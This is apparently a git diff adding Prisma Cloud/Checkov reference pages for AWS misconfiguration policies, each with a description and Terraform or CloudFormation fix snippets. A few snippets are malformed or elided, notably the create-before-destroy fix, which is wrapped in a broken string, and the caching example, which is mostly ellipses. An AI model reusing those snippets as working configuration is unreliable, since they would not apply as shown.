diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc
new file mode 100644
index 000000000..56b82c289
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc
@@ -0,0 +1,60 @@
+== AWS AMI copying does not use a Customer Managed Key (CMK)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b372b0f1-471d-4c05-97c6-aa130e1fe314
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py[CKV_AWS_236]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies AMI copies that are encrypted with default KMS keys rather than with keys managed by the customer.
+It is a best practice to use customer-managed KMS keys to encrypt your AMI copy data.
+It gives you full control over the encrypted data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_ami_copy" "pass" {
+  name              = "terraform-example"
+  description       = "A copy of ami-xxxxxxxx"
+  source_ami_id     = "ami-xxxxxxxx"
+  source_ami_region = "us-west-1"
+  encrypted         = true # default is false
+  kms_key_id        = aws_kms_key.copy.arn
+  tags = {
+    Name = "HelloWorld"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited.adoc
new file mode 100644
index 000000000..a76f5d99c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-ami-launch-permissions-are-limited.adoc
@@ -0,0 +1,52 @@
+== AWS AMI launch permissions are not limited
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 10e7ef20-2277-41c2-be01-fdf747e2573b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py[CKV_AWS_205]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+It is recommended not to grant the ability to launch AMIs across multiple accounts; if cross-account sharing is implemented, make sure it is properly controlled.
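+If cross-account sharing is genuinely required, a launch permission scoped to a single trusted account keeps the exposure limited. A minimal sketch (the image and account IDs are placeholders):
+
+[source,go]
+----
+resource "aws_ami_launch_permission" "single_account" {
+  # Grant launch access to exactly one trusted account rather than many
+  image_id   = "ami-12345678"
+  account_id = "123456789012"
+}
+----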
+
+////
+=== Fix - Runtime
+TBA
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+- resource "aws_ami_launch_permission" "remove_equivalent_block" {
+-   image_id   = "ami-2345678"
+-   account_id = "987654321"
+- }
----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc
new file mode 100644
index 000000000..1e6a0a735
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-amis-are-encrypted-by-key-management-service-kms-using-customer-managed-keys-cmks.adoc
@@ -0,0 +1,68 @@
+== AWS AMIs are not encrypted by Key Management Service (KMS) using Customer Managed Keys (CMKs)
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 63cbc1a4-ad46-4bca-8d20-aabeb4afe527
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMIEncryption.py[CKV_AWS_204]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+This policy identifies AMIs which are encrypted with default KMS keys and not with keys managed by the customer.
+It is a best practice to use customer managed KMS keys to encrypt your AMI data.
+It gives you full control over the encrypted data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_ami" "pass" {
+  name                = "terraform-example"
+  virtualization_type = "hvm"
+  root_device_name    = "/dev/xvda1"
+
+  ebs_block_device {
+    device_name = "/dev/xvda1"
+    volume_size = 8
+    snapshot_id = "someid"
+  }
+
+  ebs_block_device {
+    device_name = "/dev/xvda2"
+    volume_size = 8
+    encrypted   = true
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy.adoc
new file mode 100644
index 000000000..9fef53e4d
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-deployments-enable-create-before-destroy.adoc
@@ -0,0 +1,60 @@
+== AWS API deployments do not enable Create before Destroy
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9a8c2e43-cc8d-4113-ac3b-992a66780183
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py[CKV_AWS_217]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+It is recommended to enable the create_before_destroy argument inside the resource lifecycle configuration block to avoid possible errors such as `BadRequestException: Active stages pointing to this deployment must be moved or deleted` on recreation.
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+ + +*Terraform* + + + + +[source,go] +---- +{ + "resource "aws_api_gateway_deployment" "example" { + rest_api_id = aws_api_gateway_rest_api.example.id + stage_name = "example" + ++ lifecycle { ++ create_before_destroy = true ++ } +}", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-caching-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-caching-is-enabled.adoc new file mode 100644 index 000000000..0245c3a2b --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-caching-is-enabled.adoc @@ -0,0 +1,76 @@ +== AWS API Gateway caching is disabled + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 09e59cb9-5aaf-489a-a20a-9b6a4246c0ca + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,CloudFormation + +|=== + + + +=== Description + +A cache cluster caches responses. +With caching, you can reduce the number of calls made to your endpoint and also improve the latency of requests to your API. + +//// +=== Fix - Runtime + +. Go to the API Gateway console. + +. Select an API. + +. Select Stages. + +. In the Stages list for the API, select the required stage. + +. Go to the Settings tab. + +. Select Enable API cache. + +. Wait until cache creation is complete. +//// + +=== Fix - Buildtime + + +*Terraform* + + +---- +resource "aws_api_gateway_rest_api" "example" { + +... + +... +} +---- + + +*CloudFormation* + + +---- +Resources: +Prod: +Type: AWS::ApiGateway::Stage +Properties: + +... 
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc
new file mode 100644
index 000000000..7955acc48
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-domain-uses-a-modern-security-policy.adoc
@@ -0,0 +1,59 @@
+== AWS API Gateway Domain does not use a modern security policy
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 6a4bbef8-cb7f-43a6-8053-bc1d49994d08
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py[CKV_AWS_206]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+AWS API Gateway Domain allows you to set the security policy.
+Using TLS_1_0 allows insecure cipher suites.
+
+////
+=== Fix - Runtime
+
+. In the AWS console, go to API Gateway.
+
+. Select Custom Domain Names.
+
+. Select the domain name to update and then Edit.
+
+. For Minimum TLS version, select TLS 1.2.
+
+. Select Save.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+----
+resource "aws_api_gateway_domain_name" "example" {
+
+...
+
+  security_policy = "TLS_1_2"
+
+...
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy.adoc
new file mode 100644
index 000000000..73e151e8e
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-enables-create-before-destroy.adoc
@@ -0,0 +1,59 @@
+== Ensure AWS API gateway enables Create before Destroy
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d9b217ab-ce34-46f7-9879-d9679342ac10
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py[CKV_AWS_237]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+
+It is recommended to enable the create_before_destroy argument inside the resource lifecycle configuration block to avoid a possible outage when the API Gateway needs to be recreated during an update.
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+CloudFormation creates a new API Gateway first and then deletes the old one automatically.
+
+
+*Terraform*
+
+
+
+
+[source,go]
+----
+resource "aws_api_gateway_rest_api" "example" {
+  name = "example"
+
++ lifecycle {
++   create_before_destroy = true
++ }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching.adoc
new file mode 100644
index 000000000..8969accf1
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-api-gateway-method-settings-enable-caching.adoc
@@ -0,0 +1,60 @@
+== AWS API Gateway method settings do not enable caching
+
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| b89db1fa-40b5-4a4e-8415-18e5caab65aa
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py[CKV_AWS_225]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+
+
+=== Description
+
+Enabling caching for API Gateway helps improve your API's performance by allowing clients to retrieve responses from a cache instead of making a request to the backend service.
+This can reduce the load on your backend service and improve the overall responsiveness of your API.
+It can reduce the cost of using your API by reducing the number of requests your backend service needs to handle.
+It can also improve the reliability of your API by allowing it to continue functioning even if the backend service is unavailable or experiencing problems.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_api_gateway_method_settings" "pass" {
+  rest_api_id = aws_api_gateway_rest_api.fail.id
+  stage_name  = aws_api_gateway_stage.fail.stage_name
+  method_path = "path1/GET"
+
+  settings {
+    caching_enabled      = true
+    metrics_enabled      = false
+    logging_level        = "INFO"
+    cache_data_encrypted = true
+    data_trace_enabled   = false
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc
new file mode 100644
index 000000000..9b9168a80
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-connector-profile-uses-customer-managed-keys-cmks.adoc
@@ -0,0 +1,75 @@
+== AWS App Flow connector profile does not use Customer Managed Keys (CMKs)
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 530fa569-135d-4867-a837-722aec3cf138
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py[CKV_AWS_264]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+This policy identifies AppFlow connector profiles that are encrypted with default KMS keys instead of customer managed keys (CMKs).
+It is a best practice to use customer managed KMS keys to encrypt your AppFlow connector profile data, as this gives you full control over the encrypted data.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appflow_connector_profile" "pass" {
+  name            = "example_profile"
+  connector_type  = "Redshift"
+  connection_mode = "Public"
+  kms_arn         = aws_kms_key.example.arn
+
+  connector_profile_config {
+    connector_profile_credentials {
+      redshift {
+        password = aws_redshift_cluster.example.master_password
+        username = aws_redshift_cluster.example.master_username
+      }
+    }
+
+    connector_profile_properties {
+      redshift {
+        bucket_name  = aws_s3_bucket.example.bucket
+        database_url = "jdbc:redshift://${aws_redshift_cluster.example.endpoint}/${aws_redshift_cluster.example.database_name}"
+        role_arn     = aws_iam_role.example.arn
+      }
+    }
+  }
+}
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc
new file mode 100644
index 000000000..79adec42a
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-app-flow-flow-uses-customer-managed-keys-cmks.adoc
@@ -0,0 +1,99 @@
+== AWS App Flow flow does not use Customer Managed Keys (CMKs)
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7591727d-5d6f-4387-bbad-3adc9fc12f7d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py[CKV_AWS_263]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+This policy identifies AppFlow flows that are encrypted with default KMS keys instead of customer managed keys (CMKs).
+It is a best practice to use customer managed KMS keys to encrypt your AppFlow flow data, as this gives you full control over the encrypted data.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appflow_flow" "pass" {
+  name = "example"
+
+  source_flow_config {
+    connector_type = "S3"
+    source_connector_properties {
+      s3 {
+        bucket_name   = aws_s3_bucket_policy.example_source.bucket
+        bucket_prefix = "example"
+      }
+    }
+  }
+
+  destination_flow_config {
+    connector_type = "S3"
+    destination_connector_properties {
+      s3 {
+        bucket_name = aws_s3_bucket_policy.example_destination.bucket
+
+        s3_output_format_config {
+          prefix_config {
+            prefix_type = "PATH"
+          }
+        }
+      }
+    }
+  }
+
+  task {
+    source_fields     = ["exampleField"]
+    destination_field = "exampleField"
+    task_type         = "Map"
+
+    connector_operator {
+      s3 = "NO_OP"
+    }
+  }
+
+  kms_arn = aws_kms_key.example.arn
+
+  trigger_config {
+    trigger_type = "OnDemand"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc
new file mode 100644
index 000000000..654114760
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-at-rest.adoc
@@ -0,0 +1,52 @@
+== AWS Appsync API Cache is not encrypted at rest
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f8d70949-c727-4d47-8570-a428519a8d0e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py[CKV_AWS_214]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+Encryption of data at rest is a security feature that helps prevent unauthorized access to your data.
+The feature uses AWS Key Management Service (AWS KMS) to store and manage your encryption keys, and the Advanced Encryption Standard algorithm with 256-bit keys (AES-256) to perform the encryption.
+When enabled, the feature encrypts the API cache's data at rest.
+We recommend you implement encryption at rest in order to protect a cache containing sensitive information from unauthorized access, and to fulfill compliance requirements.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appsync_api_cache" "pass" {
+  api_id                     = aws_appsync_graphql_api.default.id
+  transit_encryption_enabled = true
+  at_rest_encryption_enabled = true
+  ttl                        = 60
+  type                       = "SMALL"
+  api_caching_behavior       = "FULL_REQUEST_CACHING"
+}
+----
\ No newline at end of file
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc
new file mode 100644
index 000000000..733cb3d38
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-api-cache-is-encrypted-in-transit.adoc
@@ -0,0 +1,55 @@
+== AWS Appsync API Cache is not encrypted in transit
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 91724d30-a293-4db3-bf5d-1a6dd04c6412
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py[CKV_AWS_215]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+This policy identifies AWS AppSync API caches that are configured with in-transit data encryption disabled.
+It is recommended that these resources be configured with in-transit data encryption to minimize the risk of sensitive data being leaked.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appsync_api_cache" "pass" {
+  api_id                     = aws_appsync_graphql_api.default.id
+  transit_encryption_enabled = true
+  at_rest_encryption_enabled = true
+  ttl                        = 60
+  type                       = "SMALL"
+  api_caching_behavior       = "FULL_REQUEST_CACHING"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled.adoc
new file mode 100644
index 000000000..8c740c99c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-has-field-level-logs-enabled.adoc
@@ -0,0 +1,54 @@
+== AWS AppSync has field-level logs disabled
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 53f3d4fd-c735-4eae-bdfa-cedec9126d68
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py[CKV_AWS_194]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,CloudFormation
+
+|===
+
+=== Description
+
+It is recommended to have a proper logging process for AWS AppSync in order to detect anomalous configuration activity.
+Logging is used to track configuration changes conducted manually and programmatically, and to trace back unapproved changes.
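+
+CloudFormation is listed among the supported frameworks but no CloudFormation snippet is shown above; the following is a minimal sketch (resource and role names are illustrative) of enabling field-level logs on an `AWS::AppSync::GraphQLApi`:
+
+[source,yaml]
+----
+Resources:
+  ExampleApi:
+    Type: "AWS::AppSync::GraphQLApi"
+    Properties:
+      Name: example
+      AuthenticationType: API_KEY
+      LogConfig:
+        CloudWatchLogsRoleArn: !GetAtt ExampleLoggingRole.Arn
+        FieldLogLevel: ALL
+----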
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appsync_graphql_api" "all" {
+  authentication_type = "API_KEY"
+  name                = "example"
+
+  log_config {
+    cloudwatch_logs_role_arn = aws_iam_role.example.arn
+    field_log_level          = "ALL"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf.adoc
new file mode 100644
index 000000000..0e80a5c51
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsync-is-protected-by-waf.adoc
@@ -0,0 +1,55 @@
+== AWS AppSync is not protected by WAF
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a95d3ca6-f16e-42b8-929f-efb0f8f24f15
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml[CKV2_AWS_33]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+Protecting your AWS AppSync API with a Web Application Firewall (WAF) helps improve its security by guarding against common web vulnerabilities such as SQL injection and cross-site scripting (XSS) attacks, inspecting incoming requests and blocking those that contain malicious payloads.
+It can also help prevent DDoS attacks by allowing you to set rate-based rules that limit the number of requests an IP address can send to your API within a specified time period.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appsync_graphql_api" "pass" {
+  authentication_type = "API_KEY"
+  name                = "example"
+}
+
+resource "aws_wafv2_web_acl_association" "pass" {
+  resource_arn = aws_appsync_graphql_api.pass.arn
+  web_acl_arn  = aws_wafv2_web_acl.example.arn
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled.adoc
new file mode 100644
index 000000000..fa0524ef9
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-appsyncs-logging-is-enabled.adoc
@@ -0,0 +1,53 @@
+== AWS AppSync's logging is disabled
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 4a84ac0e-9881-4afd-ac3c-7d5c6da1de8b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py[CKV_AWS_193]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,CloudFormation
+
+|===
+
+=== Description
+
+It is recommended to have a proper logging process for AWS AppSync in order to track configuration changes conducted manually and programmatically, and to trace back unapproved changes.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_appsync_graphql_api" "enabled" {
+  authentication_type = "API_KEY"
+  name                = "example"
+
+  log_config {
+    cloudwatch_logs_role_arn = aws_iam_role.example.arn
+    field_log_level          = "ERROR"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc
new file mode 100644
index 000000000..fae84c5e8
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-authtype-for-your-lambda-function-urls-is-defined.adoc
@@ -0,0 +1,51 @@
+== AWS Lambda function URL AuthType set to NONE
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d80b48e4-f9de-4d75-ac4c-296169303d92
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/master/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py[CKV_AWS_258]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+//Run
+
+|Frameworks
+|Terraform,CloudFormation
+
+|===
+
+=== Description
+
+The AuthType of a Lambda function URL determines how users are authenticated when they access the URL of your Lambda function.
+It is important to define the AuthType for your Lambda function URLs because it helps secure your functions and protect them from unauthorized access.
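+
+CloudFormation is listed among the supported frameworks but no CloudFormation snippet is shown above; the following is a minimal sketch (function name illustrative) of setting the AuthType on an `AWS::Lambda::Url`:
+
+[source,yaml]
+----
+Resources:
+  ExampleUrl:
+    Type: "AWS::Lambda::Url"
+    Properties:
+      TargetFunctionArn: !GetAtt ExampleFunction.Arn
+      AuthType: AWS_IAM
+----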
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_lambda_function_url" "pass" {
+  function_name      = aws_lambda_function.test.function_name
+  qualifier          = "my_alias"
+  authorization_type = "AWS_IAM"
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc
new file mode 100644
index 000000000..2ab0dbb9f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-batch-job-is-not-defined-as-a-privileged-container.adoc
@@ -0,0 +1,82 @@
+== AWS Batch Job is defined as a privileged container
+
+=== Policy Details
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 58156229-7822-40d0-871b-218e58a68462
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py[CKV_AWS_210]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+Defining your AWS Batch job as a privileged container gives it broad privileges to access system devices, such as GPUs or hardware accelerators, modify system-level configuration files, and more.
+That said, making a job overly permissive increases the potential security risk, as the job will have more access to sensitive system resources.
+
+=== Fix - Buildtime
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_batch_job_definition" "pass" {
+  name = "tf_test_batch_job_definition"
+  type = "container"
+
+  # The container properties below are illustrative (the original content was
+  # elided); the setting relevant to this policy is "privileged": false
+  # (or omitting "privileged" entirely).
+  container_properties = <<DATA
+{
+  "command": ["echo", "test"],
+  "image": "busybox",
+  "memory": 512,
+  "vcpus": 1,
+  "privileged": false
+}
+DATA
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc
new file mode 100644
index 000000000..140220ea0
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mqbrokers-minor-version-updates-are-enabled.adoc
@@ -0,0 +1,93 @@
+== AWS MQBroker's minor version updates are disabled
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| faa7d1ae-cb47-44b5-be1f-aa76e4a9c6a9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py[CKV_AWS_207]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform
+
+|===
+
+=== Description
+
+When Amazon MQ supports a new version of a broker engine, you can upgrade your broker instances to the new version.
+There are two kinds of upgrades: major version upgrades and minor version upgrades.
+Minor upgrades help maintain a secure and stable MQ broker with minimal impact on the application.
+For this reason, we recommend that automatic minor version upgrades are enabled.
+Minor version upgrades only occur automatically if a minor upgrade replaces an unsafe version, such as a minor upgrade that contains bug fixes for a previous version.
+
+////
+=== Fix - Runtime
+
+CLI Command
+
+[source,shell]
+----
+aws mq update-broker \
+  --region ${region} \
+  --broker-id ${resource_id} \
+  --auto-minor-version-upgrade
+----
+////
+
+=== Fix - Buildtime
+
+*CloudFormation*
+
+[source,yaml]
+----
+Resources:
+  Example:
+    Type: "AWS::AmazonMQ::Broker"
+    Properties:
+      BrokerName: example
+      EngineType: ActiveMQ
+      EngineVersion: "5.15.9"
+      HostInstanceType: mq.t3.micro
++     AutoMinorVersionUpgrade: true
----
+
+*Terraform*
+
+[source,go]
+----
+resource "aws_mq_broker" "example" {
+  broker_name        = "example"
+  engine_type        = "ActiveMQ"
+  engine_version     = "5.15.9"
+  host_instance_type = "mq.t3.micro"
++ auto_minor_version_upgrade = true
+}
----
diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc
new file mode 100644
index 000000000..599fe5921
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-general-policies/ensure-aws-mwaa-environment-has-scheduler-logs-enabled.adoc
@@ -0,0 +1,75 @@
+== AWS MWAA environment has scheduler logs disabled
+
